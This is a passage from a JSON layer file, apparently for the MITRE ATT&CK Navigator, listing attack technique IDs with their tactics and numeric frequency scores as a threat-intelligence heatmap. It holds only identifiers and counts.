\"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1087.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1018\",\n      \"tactic\": \"discovery\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1203\",\n      \"tactic\": \"execution\",\n      \"score\": 31,\n      \"color\": \"\",\n      \"comment\": 
\"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1068\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 29,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1592.004\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.012\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1554\",\n      \"tactic\": \"persistence\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1046\",\n      \"tactic\": \"discovery\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1587\",\n      \"tactic\": \"resource-development\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      
\"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1653\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1016\",\n      \"tactic\": \"discovery\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 34,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1219.002\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 44,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1049\",\n      \"tactic\": \"discovery\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.003\",\n      \"tactic\": 
\"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1014\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1518.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1071.001\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.002\",\n      \"tactic\": \"execution\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": 
\"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.006\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.006\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1136.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1204.001\",\n      \"tactic\": \"execution\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n     
 \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 47,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 47,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1584\",\n      \"tactic\": \"resource-development\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.006\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.006\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1030\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1057\",\n      \"tactic\": \"discovery\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.006\",\n      
\"tactic\": \"defense-evasion\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1499\",\n      \"tactic\": \"impact\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 91,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 91,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 91,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1106\",\n      \"tactic\": \"execution\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": 
\"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 27,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1040\",\n      \"tactic\": \"credential-access\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": 
[],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1040\",\n      \"tactic\": \"discovery\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1113\",\n      \"tactic\": \"collection\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1560.001\",\n      \"tactic\": \"collection\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1212\",\n      \"tactic\": \"credential-access\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1588.001\",\n      \"tactic\": \"resource-development\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1204\",\n      \"tactic\": \"execution\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1558\",\n      \"tactic\": 
\"credential-access\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 78,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 26,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1588\",\n      \"tactic\": \"resource-development\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.003\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1047\",\n      \"tactic\": \"execution\",\n      \"score\": 50,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1087\",\n      \"tactic\": \"discovery\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": 
\"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053\",\n      \"tactic\": \"execution\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053\",\n      \"tactic\": \"persistence\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1569.002\",\n      \"tactic\": \"execution\",\n      \"score\": 43,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1112\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 95,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1112\",\n      \"tactic\": \"persistence\",\n      \"score\": 95,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1213\",\n      \"tactic\": \"collection\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    
},\n    {\n      \"techniqueID\": \"T1021\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1498\",\n      \"tactic\": \"impact\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1041\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1213.003\",\n      \"tactic\": \"collection\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1195.001\",\n      \"tactic\": \"initial-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1567.001\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1609\",\n      \"tactic\": \"execution\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1611\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      
\"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 18,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1069.003\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.004\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1586\",\n      \"tactic\": \"resource-development\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1591.004\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.004\",\n      \"tactic\": \"credential-access\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 23,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      
\"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1048\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.002\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 37,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557.001\",\n      \"tactic\": \"collection\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1187\",\n      \"tactic\": \"credential-access\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.001\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1095\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n  
  {\n      \"techniqueID\": \"T1547.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1558.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 17,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1595.002\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1071.004\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 17,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1102.002\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1495\",\n      \"tactic\": \"impact\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505\",\n      \"tactic\": \"persistence\",\n      
\"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1565.002\",\n      \"tactic\": \"impact\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.004\",\n      \"tactic\": \"credential-access\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1561.001\",\n      \"tactic\": \"impact\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1561.002\",\n      \"tactic\": \"impact\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1124\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557\",\n      \"tactic\": \"credential-access\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557\",\n      \"tactic\": \"collection\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      